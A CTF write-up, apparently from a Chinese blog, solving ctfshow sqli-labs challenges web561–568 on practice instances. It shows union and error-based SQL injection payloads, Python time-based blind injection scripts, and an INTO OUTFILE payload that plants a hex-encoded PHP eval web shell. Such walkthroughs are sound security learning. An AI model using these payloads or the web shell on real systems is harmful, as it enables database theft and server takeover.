ctfshow sqli-libs web561--web568

baozongwi2024-07-05 17:04

web561

复制代码 
?id=-1 or 1--+

?id=-1 union select 1,2,3--+

?id=-1 union select 1,(select group_concat(column_name) from information_schema.columns where table_name='flags'),3--+
Your Username is : id,flag4s

?id=-1 union select 1,(select group_concat(flag4s) from ctfshow.flags),3--+

web562

找了一会注入点

复制代码 
login_password=-1' or 1#&login_user=admin&mysubmit=Login

login_password=-1' union select 1,(select schema_name from information_schema.schemata limit 0,1),3#&login_user=admin&mysubmit=Login

login_password=-1' union select 1,(select table_name from information_schema.tables where table_schema='ctfshow' limit 0,1),3#&login_user=admin&mysubmit=Login

login_password=-1' union select 1,(select column_name from information_schema.columns where table_name='flags' limit 1,2),3#&login_user=admin&mysubmit=Login

login_password=-1' union select 1,(select flag4s from ctfshow.flags),3#&login_user=admin&mysubmit=Login

web563

闭合符号换了,慢慢试或者fuzz都能出

复制代码 
login_password=1') or 1#&login_user=admin&mysubmit=Login

login_password=1') union select 1,(select group_concat(flag4s) from ctfshow.flags),3#&login_user=admin&mysubmit=Login

web564

联合注入不行直接换报错

复制代码 
?sort=-1 or updatexml(1,concat(0x3d,(select group_concat(table_name) from information_schema.tables where table_schema='ctfshow')),3)#

?sort=-1 or updatexml(1,concat(0x3d,(select group_concat(column_name) from information_schema.columns where table_name='flags')),3)#

?sort=-1 or updatexml(1,concat(0x3d,(select group_concat(flag4s) from ctfshow.flags)),3)#
XPATH syntax error: '=ctfshow{cf253675-c32d-44b1-b753'

?sort=-1 or updatexml(1,concat(0x3d,(select right(flag4s,14) from ctfshow.flags)),3)#
XPATH syntax error: '=-7384a8f276e8}'

web565

#过滤 而且有闭合

说实话这道题又学到了就是报错的不能完全显现问题

复制代码 
?sort=-1' or updatexml(1,concat(0x3d,mid((select group_concat(schema_name) from information_schema.schemata),1,32)),3)--+

?sort=-1' or updatexml(1,concat(0x3d,mid((select group_concat(schema_name) from information_schema.schemata),32,32)),3)--+

?sort=-1' or updatexml(1,concat(0x3d,mid((select group_concat(schema_name) from information_schema.schemata),64,32)),3)--+

?sort=-1' or updatexml(1,concat(0x3d,(select group_concat(table_name) from information_schema.tables where table_schema='ctfshow')),3)--+

?sort=-1' or updatexml(1,concat(0x3d,(select group_concat(column_name) from information_schema.columns where table_name='flags')),3)--+

?sort=-1' or updatexml(1,concat(0x3d,(select group_concat(flag4s) from ctfshow.flags)),3)--+
XPATH syntax error: '=ctfshow{84276d8d-335f-45a8-953e'

?sort=-1' or updatexml(1,concat(0x3d,(select right(flag4s,14) from ctfshow.flags)),3)--+
XPATH syntax error: '=-cf3c418edc17}'

web566

找到时间盲注点

复制代码 
?sort=1 and if(1,sleep(5),3)--+
但是就会卡死这个界面并不能只停五秒,而是直接卡死了,那么我们把时间调低

我写了个?sort=-1 and if(1,sleep(0.4),3)--+,但是我用手机秒表记的是5.5秒就算有误差也是远大于了差不多是十倍的样子,我们就可以这样子来写脚本了

为了搞懂这个刷了两个靶机

python 复制代码 
import requests

flag=""
i=0
while True:
    i += 1
    low = 32
    high =127

    while low < high:
        mid = (low+high)//2


        # url=f"https://f53f4790-9853-4a7d-8dff-ea73d3d933d2.challenge.ctf.show/?sort=1 and if((ascii(substr((database()),{i},1))>{mid}),sleep(0.05),0) --+"
        #security
        # url = f"https://f53f4790-9853-4a7d-8dff-ea73d3d933d2.challenge.ctf.show/?sort=1 and if((ascii(substr((select group_concat(schema_name) from information_schema.schemata),{i},1))>{mid}),sleep(0.05),0) --+"
        #information_schema,test,ctftraining,mysql,performance_schema,ctfshow,security
        # url = f"https://f53f4790-9853-4a7d-8dff-ea73d3d933d2.challenge.ctf.show/?sort=1 and if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),{i},1))>{mid}),sleep(0.05),0) --+"
        # flags
        # url = f"https://f53f4790-9853-4a7d-8dff-ea73d3d933d2.challenge.ctf.show/?sort=1 and if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flags'),{i},1))>{mid}),sleep(0.05),0) --+"
        #id,flags
        url = f"https://f53f4790-9853-4a7d-8dff-ea73d3d933d2.challenge.ctf.show/?sort=1 and if((ascii(substr((select(group_concat(id,flag4s))from(ctfshow.flags)),{i},1))>{mid}),sleep(0.05),0) --+"

        try:
          r=requests.get(url=url,timeout=0.5)
          high =mid
        except:
           low =mid +1
    if low!= 32:
        flag+=chr(low)
    else:
        break
    print(flag)

其他的注入没找到

复制代码 
写马
?sort=1 into outfile "/var/www/html/1.php"lines terminated by 0x3c3f706870206576616c28245f504f53545b315d293b3f3e2020--+

antsowrds也链接上了,但是没找到flag

于是想到了数据库操作,欧克了

web567

复制代码 
?sort=-1 and if(1,sleep(5),0)--+

上EXP

python 复制代码 
import requests

flag=""
i=0
while True:
    i += 1
    low = 32
    high =127

    while low < high:
        mid = (low+high)//2


        # url=f"https://006fae05-522f-4518-8beb-9ea250a7441c.challenge.ctf.show/?sort=-1 and if((ascii(substr((database()),{i},1))>{mid}),sleep(0.05),0) --+"
        #security
        #url = f"https://006fae05-522f-4518-8beb-9ea250a7441c.challenge.ctf.show/?sort=-1 and if((ascii(substr((select group_concat(schema_name) from information_schema.schemata),{i},1))>{mid}),sleep(0.05),0) --+"
        #ctfshow, ctftrainiqg / inhormatiqq_scnema, mysql, uerfortanch_scjema2security, tfst
        #url = f"https://006fae05-522f-4518-8beb-9ea250a7441c.challenge.ctf.show/?sort=-1 and if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),{i},1))>{mid}),sleep(0.05),0) --+"
        # flags
        # url = f"https://006fae05-522f-4518-8beb-9ea250a7441c.challenge.ctf.show/?sort=-1 and if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flags'),{i},1))>{mid}),sleep(0.05),0) --+"
        #id,flags
        url = f"https://d4f9f99f-83ff-4d69-8770-b62aa3feda9c.challenge.ctf.show/?sort=-1 and if((ascii(substr((select(group_concat(id,flag4s))from(ctfshow.flags)),{i},1))>{mid}),sleep(0.05),0) --+"

        try:
          r=requests.get(url=url,timeout=0.5)
          high =mid
        except:
           low =mid +1
    if low!= 32:
        flag+=chr(low)
    else:
        break
    print(flag)
复制代码 
?sort=1 into outfile "/var/www/html/1.php"lines terminated by 0x3c3f706870206576616c28245f504f53545b315d293b3f3e2020--+

链接就行

web568

复制代码 
?sort=-1' or updatexml(1,concat(0x3d,mid((select group_concat(schema_name) from information_schema.schemata),32,32),0x3d),3)--+

?sort=-1' or updatexml(1,concat(0x3d,mid((select group_concat(schema_name) from information_schema.schemata),64,32),0x3d),3)--+

?sort=-1' or updatexml(1,concat(0x3d,(select group_concat(table_name) from information_schema.tables where table_schema='ctfshow')),3)--+

?sort=-1' or updatexml(1,concat(0x3d,(select group_concat(column_name) from information_schema.columns where table_name='flags')),3)--+

?sort=-1' or updatexml(1,concat(0x3d,(select group_concat(flag4s) from ctfshow.flags)),3)--+
XPATH syntax error: '=ctfshow{53cd62dc-e92a-4948-9958'

?sort=-1' or updatexml(1,concat(0x3d,(select right(flag4s,14) from ctfshow.flags)),3)--+
XPATH syntax error: '=-d7c00388f597}'
相关推荐
sheji52613 分钟前
JSP基于信息安全的读书网站79f9s--程序+源码+数据库+调试部署+开发环境
java·开发语言·数据库·算法
Teame_10 分钟前
渗透课程学习总结
网络·安全·web安全
海域云-罗鹏19 分钟前
国内公司与英国总部数据中心/ERP系统互连,SD-WAN专线实操指南
大数据·数据库·人工智能
编程火箭车19 分钟前
04.第一个 Python 程序:Hello World 从编写到运行全解析
python·python第一个程序·python入门报错解决·python新手教程·hello world 程序·python终端运行·pycharm运行代码
千寻技术帮35 分钟前
10404_基于Web的校园网络安全防御系统
网络·mysql·安全·web安全·springboot
qq_4232339040 分钟前
如何用FastAPI构建高性能的现代API
jvm·数据库·python
凯子坚持 c1 小时前
Qt常用控件指南(8)
开发语言·数据库·qt
疯狂踩坑人1 小时前
【Python版 2026 从零学Langchain 1.x】(二)结构化输出和工具调用
后端·python·langchain
春生野草1 小时前
Redis
数据库·redis·缓存
HDO清风1 小时前
CASIA-HWDB2.x 数据集DGRL文件解析(python)
开发语言·人工智能·pytorch·python·目标检测·计算机视觉·restful
热门推荐
01GitHub 镜像站点02Clawdbot 中文汉化版 接入微信、飞书032026美赛A题智能手机电池续航时间预测的连续时间数学模型04OpenCode 入门教程:介绍 · 安装 · 配置第三方 API (如 Claude)052025 年大语言模型发展回顾:关键突破、意外转折与 2026 年展望06OpenClaw部署与配置教程:在Mac mini上接入国产大模型与飞书07【Milvus】向量数据库pymilvus使用教程082026数学建模美赛题目特点与选题建议,常用四大模型汇总09Linux下V2Ray安装配置指南10Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services